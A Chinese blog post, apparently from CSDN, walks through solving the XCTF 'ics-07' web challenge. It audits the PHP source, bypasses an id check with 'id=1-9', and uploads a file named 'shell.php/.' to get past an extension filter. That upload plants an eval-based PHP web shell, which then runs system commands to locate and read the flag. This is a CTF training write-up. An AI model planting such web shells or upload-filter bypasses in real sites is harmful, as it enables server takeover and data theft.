xctf攻防世界ics-07 wp

最新推荐文章于 2024-04-15 10:47:16 发布
最新推荐文章于 2024-04-15 10:47:16 发布
阅读量205 收藏 1
点赞数
分类专栏: CTF writeup 文章标签: 安全 php wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/113887196
版权
CTF 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

xctf攻防世界ics-07 wp

在这里插入图片描述
考察知识点:php代码审计、命令执行
访问题目地址
在这里插入图片描述
随便点一点,康康能发现什么
在这里插入图片描述
发现这里有源码
在这里插入图片描述

进行php代码审计
分析:
参数page存在且其值不等于index.php,才会包含flag.php
在这里插入图片描述
将$ con的内容写入$ file中,但文件后缀名不能为.php3/4/5/6/7/t/html
在这里插入图片描述
$_SESSION[‘admin’] = True可以满足以上所需
此段需要满足参数id存在,id的浮点值不为’1’,id参数的最后一个数值是9
在这里插入图片描述
可以使用id=1-9来绕过

Payload:

http://111.200.241.244:53209/index.php?page=flag.php&id=1-9

在这里插入图片描述
可以看到源码中有
在这里插入图片描述
此时尝试使用post方式上传文件,file为文件名,con为文件内容,
正则的话是判断.之后的字符,因此可以利用/.的方式绕过,这个方式的意思是在文件名目录下在加个空目录,相当于没加,因此达到绕过正则的目的

file=shell.php/.&con=<?php @eval($_POST['pass']);?>

访问http://111.200.241.244:53209/uploaded/backup/看看是否将shell写上去

在这里插入图片描述
用POST传参pass=system('whoami');康一康
在这里插入图片描述

pass=system('find / -name *flag*');查找flag

在这里插入图片描述

pass=system('tac /var/www/html/flag.php');拿到flag

在这里插入图片描述

sash1mi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Web安全攻防世界09 ics-07XCTF
weixin_42789937的博客
01-29 956
Web安全攻防世界09 ics-07XCTF),友情提示:攻防世界最近的答环境不太稳定,我这篇没有做到最后一步...
攻防世界CTF | WPics-07
ethan18的博客
02-01 2187
攻防世界CTF | WPics-07目思路查看界面 目 思路 查看界面 打开目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下 我们看到有一个源代码链接,点击链接的源代码如下 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) &&
【愚公系列】2023年06月 攻防世界-Web(ics-07
时光隧道
06-15 4099
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界----ics-07
qq_44418229的博客
07-26 399
攻防世界---ics-07 分析源码+正则
攻防世界WEB】难度五星15分进阶ics-07
07-24 570
攻防世界WEB】五星15分
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-HW-pipeline附件
11-09
附件
攻防世界ics-07
最新发布
wangzhemvp的博客
04-15 566
session 的工作机制是:为每个访客创建一个唯一的 id (UID),并基于这个 UID 来存储变量。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/..进入的是1.php文件夹。匹配 ".php"、".php3"、".php4"、".php5"、".php7"、".phpt" 或 ".phtml" 结尾的文件名。(1)if ($_SESSION['admin']):判断 session 中的 admin 是否有值。一个点调用最后面的文件,两个点调用第一个文件。
攻防世界 ics-07
CyhDl666的博客
02-24 481
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界 ics-07
qq_43622442的博客
03-05 1470
攻防世界 ics-07 写在txt里当笔记太不方便了= =以后还是写这儿吧 1.打开首页是这样子 2.看那个提示,一开始我还以为是直接view-source,没想到那个是个超链接= =点它,出现源码 3.审计一下,利用点在这儿: 4.但是session我们无法自己伪造,看下面的代码: 5.看到sql就想注入= =但是这里宽字节并不行。看一下这句,只要result有值我们就可以上传文件了...
XCTF-高手进阶区:ics-07
1stPeak's Blog
04-14 595
目: 发现view-source <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start...
CTF -攻防世界-web高手区-ics-06
aon8069924165211的博客
08-05 1423
打开网址 根据意点开报表中心(因为其他的点开都一样,不信你试试) 会看见id =1 想到burp爆破id 所以打开burp抓包(不会抓包的百度 或者看我web新手区,有一就有抓包 我说的很详细) 右击 然后你会发现 会发现id=2333时候length不一样 注意 不要一个个找 length点一下会排序。。。 ok搞定 ...
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4553
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 960
首先打开目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
攻防世界xctf writeup ics-07
qq_43370221的博客
04-20 604
文章目录xctf_writeup_ics-07审计代码审计写入文件代码构造最后的payload菜刀连接的到webshell xctf_writeup_ics-07 审计代码 浏览页面 发现了view-source链接 ,接下来审计代码 if (!isset($_GET[page])) { show_source(__FILE__); die(); }...
攻防世界ics-07 wp
freerats的博客
06-14 336
打开容器,看到view-source,点进去可以看到源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else { he
[wp] 攻防世界 isc-07
MercyLin的博客
09-16 947
首先看源代码里的这一段: if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'config.php'; $id = mysql_real_escape_string($_GET[id]); ...
web-ics-05
07-28
- *2* [攻防世界-ics-05-(详细操作)做笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值